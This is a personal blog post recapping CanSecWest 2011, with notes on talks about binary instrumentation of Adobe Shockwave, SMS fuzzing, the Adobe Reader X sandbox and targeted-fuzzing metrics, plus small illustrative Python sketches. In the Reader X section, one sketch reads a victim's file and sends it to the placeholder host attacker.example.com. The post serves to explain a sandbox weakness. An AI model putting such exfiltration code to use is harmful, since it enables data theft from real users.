CanSecWest 2011

Yes, that’s right…  After many, many years of wanting to attend this conference, I finally made it.  CanSecWest has been heralded as one of the best, top-quality security conferences that you can attend, and while I actually made it across the pond a few years ago to speak at EUSecWest, the logistics for getting up to CanSecWest just never worked out for me…  until this year.

I have to say, the hype I’ve heard over the years is well deserved.  The talks that I saw were excellent, registration was quick and smooth, the overall venue was very nice and quite accommodating, and Vancouver is a beautiful city.  I arrived on Tuesday evening before the conference and checked into the hotel.  I ended up with a corner room in the North Tower that had a nice amount of space and was near the conference hall, which made it quite convenient to go back and forth between the conference and my room when I needed to work.  I actually did get a fair amount of work done, as for some reason a lot of my clients waited until I was at the conference to email me new submissions, and I was managing another round of development for the ExploitHub and reviewing its latest contracts.

The Tronapalooza party at Five Sixty on Thursday night was ++awesome.  Five Sixty can only be described as a video game bar, with retro arcade games lining the walls, a line of racing games complete with bucket seats and wheel/pedal controllers along one wall, and a HUGE projector screen upstairs for larger-than-life Street Fighter on Xbox.  The bars were open and flowing, there was a decent sized dance floor, and the DJs rocked it.  Had the Ms. Pacman machine been set to fast mode instead of slow, it would have been a PERFECT venue in my opinion.

One highlight of my conference experience was the massage room.  I had just spent about four and a half hours up in my hotel room poring over the latest ExploitHub contracts when I finished up and went downstairs to see what talk was currently being given.  It was about halfway through and wasn’t something that I was too terribly interested in anyway, so I decided to walk upstairs and see who was hanging out in the lobby bar.  After the first set of escalators I saw the massage room and thought to myself, “Self, that’s a PERFECT reward for just having spent four and a half hours reading contracts”, so I got myself a massage, and it was fantastic.  Whoever had the bright idea of having a massage room at the conference is a genius.

Anyhow, my notes on the few talks that I did manage to attend are below.

Black Box Auditing Adobe Shockwave
Aaron Portnoy & Logan Brown

I would have named this talk “Adventures in Dynamic Binary Instrumentation” myself, as every few slides Aaron and Logan were solving some problem they had run into using some DBI technique.  While the target of the assessment they were detailing was Adobe Shockwave, I got much more out of this talk regarding the DBI techniques.  I won’t be discussing much of the ZDI-related process info or statistics that they presented, as that bit of the talk wasn’t all that interesting to me; however, I must note that those bits were the motivation behind the assessment and why they developed some of the techniques that they did.

The first, and a very important, point that they made was that Adobe Shockwave is NOT Adobe Flash.  While the two products essentially do much of the same thing, and Adobe will shortly end-of-life the Shockwave product line in favor of Flash, they are two distinct and different code-bases.  Also, Shockwave has no symbols when you disassemble it, and functions are exported by ordinal, which makes taking a first look at this product unintuitive.  Additionally, !heap from WinDbg indicated that this product has its own memory manager rather than relying on the operating system’s memory manager.  One of the first things this product does when starting up is to allocate about a gigabyte of memory from the operating system for its own memory manager to manage.  Instead of starting off by reversing an entire custom memory manager, Aaron and Logan decided to use Dynamic Binary Instrumentation (DBI) to hook read functions, using pre- and post-call hooks to identify where in memory data was being stored and then searching those locations for the injected fuzzer data that they were looking for.  The result was a much faster and more scalable method than using breakpoints in the debugger.
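To make the hook-based approach concrete, here’s a minimal, self-contained Python sketch of the pre/post-call hook pattern as I understood it.  This is my own illustration, not their actual tooling; the hooked read routine and the “process memory” are simulated stand-ins so it runs anywhere.  The pre-hook records which buffer the callee is about to fill, and the post-hook scans that buffer for the fuzzer’s marker bytes, so you learn where injected data lands without single-stepping in a debugger.

```python
# A minimal sketch of the pre/post-call hook idea (my own illustration, not the
# speakers' actual DBI tooling).  Memory and the read routine are simulated.

FUZZ_MARKER = b"\xde\xad\xbe\xef"    # bytes the fuzzer embeds in its input files

memory = bytearray(0x1000)           # stand-in for a slice of the target's memory
hits = []                            # (offset, length) of buffers containing marker

def target_read(dst_off, length):
    """Stand-in for the hooked read routine: copies 'file' data into memory."""
    file_data = (b"AAAA" + FUZZ_MARKER + b"BBBB")[:length]
    memory[dst_off:dst_off + len(file_data)] = file_data

def pre_hook(dst_off, length):
    # Pre-call hook: just record where the callee is about to write.
    return (dst_off, length)

def post_hook(ctx):
    # Post-call hook: scan the recorded buffer for the injected marker bytes.
    dst_off, length = ctx
    if FUZZ_MARKER in bytes(memory[dst_off:dst_off + length]):
        hits.append(ctx)

def hooked_read(dst_off, length):
    ctx = pre_hook(dst_off, length)
    target_read(dst_off, length)
    post_hook(ctx)

hooked_read(0x100, 64)
print(hits)    # [(256, 64)] -> the fuzzer's data landed in this buffer
```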

An interesting side-quest that they embarked upon during this assessment came when they noticed that the slim version of Shockwave would dynamically go out and download support DLLs for unsupported file formats.  They attempted to compromise this update feature, since it’s essentially going out, grabbing executable code, and then executing it; however, Adobe was smart for once and was signing these DLL packages with a digital signature including an embedded certificate, so that adventure led to a dead-end.

After fuzzing, Aaron and Logan identified approximately 2500 crashes using simple bit-flipping fuzzing techniques, and about 4000 more crashes fuzzing the RIFF file structure.  They also used another DBI technique while fuzzing to great success, which involved hooking exceptions and performing memory allocation as they happened.  When a memory read exception occurred, they would inject code that allocated memory at the faulting address, simulate a heap spray by writing heap-spray data there, and then return to execution hoping for a write exception.  This technique is very effective at further verifying that a crash may be exploitable, since it automatically progresses to feeding the read call malicious data and logging the resulting write exceptions, rather than collecting a huge batch of read exceptions and then having to go analyze them all manually.
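Here’s a rough Python model of that triage loop as I understood it (my own paraphrase, not the speakers’ code): on a read access violation, “map” the faulting page, fill it with spray-style data, and resume; if execution then faults on a write, the crash gets flagged as far more interesting.  The debugged process is a toy stand-in so the example is runnable on its own.

```python
# Rough model of the exception-driven triage idea (my paraphrase, not their code).

SPRAY = 0x41   # classic heap-spray filler byte

class ToyTarget:
    """Toy stand-in for a debugged process that faults on unmapped addresses."""
    def __init__(self):
        self.mapped = {}                        # page base -> bytearray

    def _page(self, addr):
        return addr & ~0xFFF

    def access(self, addr, kind):
        if self._page(addr) not in self.mapped:
            return ("ACCESS_VIOLATION", kind, addr)
        return None

    def map_sprayed_page(self, addr):
        self.mapped[self._page(addr)] = bytearray([SPRAY] * 0x1000)

def triage(target, accesses):
    """Replay a crash's memory accesses, upgrading read faults into write faults."""
    for addr, kind in accesses:
        fault = target.access(addr, kind)
        if fault is None:
            continue
        if kind == "read":
            # Simulate the heap spray at the faulting address and keep executing.
            target.map_sprayed_page(addr)
        else:
            return ("write AV - likely worth exploiting", hex(addr))
    return ("read-only crash", None)

# The read fault gets "sprayed over"; the later write goes through a pointer made
# of spray bytes (0x41414141), which is exactly the kind of fault we want logged.
print(triage(ToyTarget(), [(0x0C0C0C0C, "read"), (0x41414141, "write")]))
```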

Eventually, though, Aaron and Logan did have to reverse the custom memory manager, but after some initial analysis they discovered that it was an off-the-shelf memory manager called SmartHeap.  SmartHeap has five different APIs that all do different things.  This library still had no exported symbols, except for one implementation of it for OS X if I recall correctly.  By binary-diffing the different implementations against each other, and by using yet more DBI techniques to gather statistics on function calls and search for correlations and patterns, such as memory allocation and memory freeing functions having roughly the same number of calls made to them, Aaron and Logan were able to make a fair amount of progress reversing this memory manager.  It turns out that when you find vulnerabilities in products that use SmartHeap, they are relatively easy to exploit, as SmartHeap has no exploitation mitigations like ASLR, heap cookies, etc.
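A toy sketch of that call-count correlation idea, purely my own illustration rather than their tool: routines whose call counts rise and fall together across recorded runs are good candidates for allocator/free pairs, since most allocations eventually get freed.  The routine names and counts below are made up.

```python
# Toy sketch of correlating per-function call counts gathered via DBI.
from itertools import combinations
from statistics import correlation, StatisticsError   # requires Python 3.10+

# call counts per unnamed routine ("sub_xxxx") across several recorded runs
call_counts = {
    "sub_1000": [120, 340, 95, 410],   # suspected allocator
    "sub_1400": [118, 338, 96, 405],   # tracks sub_1000 closely -> suspected free
    "sub_2200": [3, 3, 3, 3],          # init-style routine, fixed number of calls
    "sub_3100": [50, 12, 300, 7],      # unrelated helper
}

for a, b in combinations(call_counts, 2):
    try:
        r = correlation(call_counts[a], call_counts[b])
    except StatisticsError:            # constant series (no variance) can't correlate
        continue
    if r > 0.99:
        print(f"{a} / {b} look paired (r={r:.3f}) -> candidate alloc/free pair")
```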

In the end, Aaron and Logan indicated that they had found and fully developed around 20 0day vulnerabilities, as well as built a number of analysis tools using DBI techniques.

SMS-o-Death: From Analyzing To Attacking Mobile Phones on a Large Scale
Nico Golde and Collin Mulliner

This was a fairly straightforward talk and has apparently been given at previous conferences, so I’m not going to go into too much detail here.  I did my own research into the GSM space about five years ago, so I was very familiar with Nico and Collin’s point that while phone hardware and software are largely proprietary and closed source, the GSM specs are open, which makes research via fuzzing the protocols quite approachable.  They also made a point that I remember well about there being a TON of GSM specs.  Literally thousands and thousands of pages of text.  It was an interesting space to be working in at the time, but the sheer volume of it can indeed overwhelm you.  Anyhow, the result of their research is that after fuzzing over SMS, they identified crashes in every single product that they tested, which included a lot of major phone manufacturers and models.

A Castle Made of Sand: Adobe Reader X Sandbox
Richard Johnson

Richard started off his talk with some interesting statistics about Adobe Reader, such as that it had about 30% market share as of June 2010 and that it has had 358 vulnerabilities in the last 10 years, 278 of which resulted in code execution and about 22 of which were actively exploited in the wild.  It would seem that Adobe has good reason to attempt to mitigate exposure after a compromise by employing a sandbox, and their sandboxing approach made its debut in Adobe Reader X, which not only employs a sandbox but is also hardened to utilize the mitigation technologies provided by the operating system, such as ASLR and DEP with the PERMANENT flag.  As a result, it seems that PDF-based attacks have fallen by about 30% since Q2 of 2010.  Richard did note, however, that some 3rd-party crypto libraries that Adobe Reader includes do not make use of these mitigation technologies, which, if you have Reader load the crypto features, results in about 1.5 megabytes of non-randomized memory in the Reader process’s address space.  How ironic that loading security libraries actually introduces more opportunity for successful exploitation…

Anyhow, the “Protected Mode” sandbox separates the rendering code from the initialization and management processes: the rendering code is not allowed to write to the filesystem, and API and system calls are filtered through the parent process.  The default configuration of the sandbox has JavaScript enabled (although there is a JavaScript API black-list in place), ACLs for file, registry, and process access, and logging disabled.  Given all this, you still have some opportunities for attack and security analysis, such as leveraging a vulnerability in the rendering process, which is the most likely attack surface, to load an attack DLL and then using that DLL to attack the broker or parent process.  This attack DLL could be a fuzzer, or a more targeted exploit if you’ve discovered a vulnerability in the parent or broker process.  Another interesting aspect of the sandbox’s configuration is that socket and handle use is not restricted, therefore it could be possible to use a PDF file as a pivot into a target network.  Also, reading files and reading clipboard data is not restricted, so similarly a PDF could be used as a platform for the exfiltration of data.  Finally, the log file, if logging is actually enabled (which, as stated earlier, it is not by default), is writable.  This makes it possible to potentially cover one’s tracks when performing an attack by wiping or cleaning up the log file.  Overall, it sounds like Adobe is taking some steps in the right direction, however there are still a number of attack vectors present as well as some fairly insecure defaults.
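As a trivial illustration of that exfiltration point, and purely my own sketch rather than anything Richard showed, code running inside the renderer would only need the two capabilities the sandbox leaves open, file reads and outbound sockets, to push local data off the box.  The host, port, and file path below are made-up placeholders.

```python
# Hypothetical illustration of why unrestricted file reads plus unrestricted
# sockets matter: payload code in the sandboxed renderer could read local data
# and send it out over the network.  Host, port, and path are placeholders.
import socket

TARGET_HOST = "attacker.example.com"                    # made-up collection server
TARGET_PORT = 4444
LOOT_PATH = r"C:\Users\victim\Documents\secrets.txt"    # made-up file path

def exfiltrate(path, host, port):
    with open(path, "rb") as f:                          # file reads are not restricted
        data = f.read()
    with socket.create_connection((host, port)) as s:    # outbound sockets are allowed
        s.sendall(data)

# exfiltrate(LOOT_PATH, TARGET_HOST, TARGET_PORT)
```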

Security Defect Metrics for Targeted Fuzzing
Dustin Duran, Matt Miller, and David Weston

This was overall a very well thought-out, performed, and summarized experiment by the researchers and the extended team that they mentioned in the credits.  That said, due to certain factors like extremely short test periods, a small number of input file formats, small numbers of crash results, and so forth, it was very obviously just that: an experiment.  I would very much like to see this same experiment performed with much larger data sets and testing periods to get a better idea of how biased the results were by the bounds of the experiment.

First the researchers outlined their motivation for this experiment.  They described three challenges with fuzzing as a vulnerability discovery technique: “dumb” fuzzing is blind, even if fast; “smart” fuzzing sits at the opposite end of the spectrum, being targeted and more apt to find crashes, but it is also higher cost in both computing and human resources and due to this could have a much lower ROI; and there really aren’t any current fuzzing techniques that sit in the middle of that spectrum.  They also cited that many researchers have a finite amount of resources and time to perform the fuzzing phase of an assessment, and that with most fuzzing approaches today the process is fairly opaque, with limited visibility into the fuzzing itself as well as the code coverage achieved by any particular fuzzing run.

After outlining the motivation and challenges, the researchers described their approach, called “taint-driven” fuzzing, which was loosely defined as dynamic analysis that allows mutation target offsets to be selected based on observing what code operates on what memory locations.  Given that with this approach you’re targeting specific functions in code that are reachable via the application’s inputs, they then covered a number of different metrics that could be used for choosing your fuzzing targets.  The team presented five different metrics, the first of which was referred to as Cyclomatic Complexity, which essentially means that the more complex the function is, the more bugs it is likely to have.  Second was a metric based on crash reports from the field.  Microsoft has a fairly robust error reporting mechanism for most of its products, so that when they crash they offer to send the crash report directly to Microsoft.  These crash reports identify the code that they crashed in, so using these reports for target selection makes absolute sense.  Third was a metric based on static analysis issues such as compiler warnings, use of known-problematic sub-functions and system calls, etc.  Fourth was a metric based on the attack surface within the function, as presented by the instructions in the function that operate on tainted data.  The fifth metric was based on perceived exploitability and was rather interesting: essentially, step through every instruction in a target function, simulate a crash on that instruction, and then use WinDbg’s !exploitable logic to indicate whether a crash there would be obviously exploitable or not.  Collecting the results from these simulations, you can calculate a score for how potentially exploitable any given function is, assuming a crash exists.
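Here’s a hedged sketch of that fifth metric as I understood it, not the presenters’ code: walk each instruction of a function, pretend it faulted, ask a !exploitable-style classifier how bad that fault would look, and roll the verdicts up into a single per-function score used to rank fuzzing targets.  The disassembly, classifier, and weights below are toy stand-ins of my own.

```python
# Sketch of a per-instruction exploitability score (my illustration only).

# toy disassembly of one function: (mnemonic, operands)
FUNCTION = [
    ("mov",  "eax, [ecx+8]"),    # read through a possibly tainted pointer
    ("add",  "eax, 4"),
    ("mov",  "[eax], edx"),      # write through a derived pointer
    ("call", "eax"),             # control transfer through a register
    ("ret",  ""),
]

def classify(mnemonic, operands):
    """Crude stand-in for a !exploitable-style verdict on a simulated crash here."""
    if mnemonic in ("call", "jmp"):
        return "EXPLOITABLE"                    # crash on a control transfer
    if mnemonic == "mov" and operands.startswith("["):
        return "EXPLOITABLE"                    # write access violation
    if "[" in operands:
        return "PROBABLY_EXPLOITABLE"           # read access violation
    return "UNKNOWN"

WEIGHTS = {"EXPLOITABLE": 3, "PROBABLY_EXPLOITABLE": 1, "UNKNOWN": 0}

score = sum(WEIGHTS[classify(m, ops)] for m, ops in FUNCTION)
print(f"exploitability score for this function: {score}")   # higher = fuzz it first
```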

Finally, the group disclosed their results, which included lots of charts and graphs and various views of the data from differing perspectives.  I’ll leave it to you to go dig into their research if you want the exact details, but in a nutshell, the team tested four binary file formats using five fuzzing engines (three that were taint-based and two control fuzzers) and six different metrics (the five outlined above plus a control that was entirely random), and spent five days on each combination of fuzzing engine, metric, and target file format.  The results were somewhat inconclusive, other than an indication that the larger the code base, the more applicable taint-based fuzzing seems to be, as its results improved over the control fuzzing engines as the application’s code-base grew in size.
